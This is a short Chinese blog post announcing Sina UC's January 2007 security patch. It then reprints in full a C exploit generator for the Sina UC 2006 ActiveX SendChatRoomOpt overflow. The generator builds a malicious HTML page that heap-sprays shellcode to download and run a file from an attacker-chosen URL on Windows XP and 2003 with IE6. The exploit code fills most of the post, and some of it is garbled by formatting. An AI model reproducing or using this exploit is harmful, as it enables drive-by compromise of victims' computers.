新浪UC安全补丁SP1和攻击代码

2007年1月11日 | 分类: IM专区 | 标签: , ,

新浪UC在2007.01.10上午放出了针对前天发现的bug的补丁,原文:“新浪UC安全补丁,2007年1月10日以前发布的新浪UC各版本客户端需要立即安装,非常重要.”
下载页面:http://download.51uc.com/uc_download.shtml?tool_0


同时国内攻击组织放出攻击代码:
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

#include
#include
#include
#include

FILE *fp = NULL;
char *file = “fuck_uc.html”;
char *url = NULL;

unsigned char sc[] =
“x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70”
“x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8”
“xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00”
“x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00”
“x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45”
“x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40”
“x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75”
“x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00”
“x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5”
“x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a”
“x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c”
“x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c”
“x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45”
“x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59”
“x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08”
“x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00”
“x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03”
“xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7”
“x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c”
“x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41”
“xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d”
“x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24”
“x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5”
“x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e”
“x00”;

char * header =
” “
” “
” “
” “
“var heapSprayToAddress = 0×0c0c0c0c; “
“var shellcode = unescape(“%u9090″+”%u9090″+ “;

char * footer =
” “
“var heapBlockSize = 0×100000; “
“var payLoadSize = shellcode.length * 2; “
“var spraySlideSize = heapBlockSize – (payLoadSize+0×38); “
“var spraySlide = unescape(“%u9090%u9090”); “
“spraySlide = getSpraySlide(spraySlide,spraySlideSize); “
“heapBlocks = (heapSprayToAddress – 0×100000)/heapBlockSize; “
“memory = new Array(); “
“for (i=0;i
” memory = spraySlide + shellcode; } “

“function getSpraySlide(spraySlide, spraySlideSize) { “
“while (spraySlide.length*2
“{ spraySlide += spraySlide; } “
” spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } “;

// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i < buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
fprintf(fp, “%s”, “” + “”);
}
else
{
fprintf(fp, “%s”, “””);
}
}
fprintf(fp, “%%u%0.4x”,((unsigned short*)lpBuff)[i/2]);
}
//把shellcode打印在header后面,然后用 ” ) ” 闭合
fprintf(fp, “%s”, “”); “);
}

int main( int argc, char *argv[] )
{
if( argc != 3 )
{
printf( ” UC ActiveX object exp,Code by 云舒 &amp; LuoLuo,ph4nt0morg ” );
printf( “Usage: %s “, argv[0] );
printf( ” 1 Windows XP SP2 Chinese version,IE 6 ” );
printf( ” 2 Windows 2003 standard SP1 Chinese Version, IE 6 ” );

return -1;
}

char seh[1024] = { 0 };
int os = atoi( argv[2] );
int len = 0;

if( os == 1 )
{
len = 3133;
}
else if( os == 2 )
{
len = 3193;
}

sprintf( seh , “var obj = new ActiveXObject(“BROWSER2UC.BROWSERToUC”); var arg1; for( var i = 0; i < %d; i ++ ) { arg1 += "A"; }arg1=arg1 + unescape("%%0c%%0c%%0c%%0c"); arg2="defaultV"; arg3=1; arg4=1; obj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4); ", len ); url = argv[1];
if( (!strstr(url, “http://”) && !strstr(url, “ftp://”)) || strlen(url) < 10)
{
printf(“[-] Invalid url. Must start with 'http://','ftp://' “);
return -1;
}

printf(“[+] download url:%s “, url);

fp = fopen( file , “w” );
if( fp == NULL )
{
printf( “Create file error: %d “, GetLastError() );
return -1;
}
fprintf( fp, “%s”, header );
fflush( fp );

char buffer[4096] = { 0 };
int sc_len = sizeof(sc)-1;
memcpy(buffer, sc, sc_len);
memcpy(buffer+sc_len, url, strlen(url));

sc_len += strlen(url)+1;
PrintPayLoad((char *)buffer, sc_len);
fflush( fp );

fprintf( fp, “%s”, footer );
fprintf( fp, “%s”, seh );

fflush( fp );
fclose( fp );

printf( “Create done!please look %s “, file );
}

目前还没有任何评论.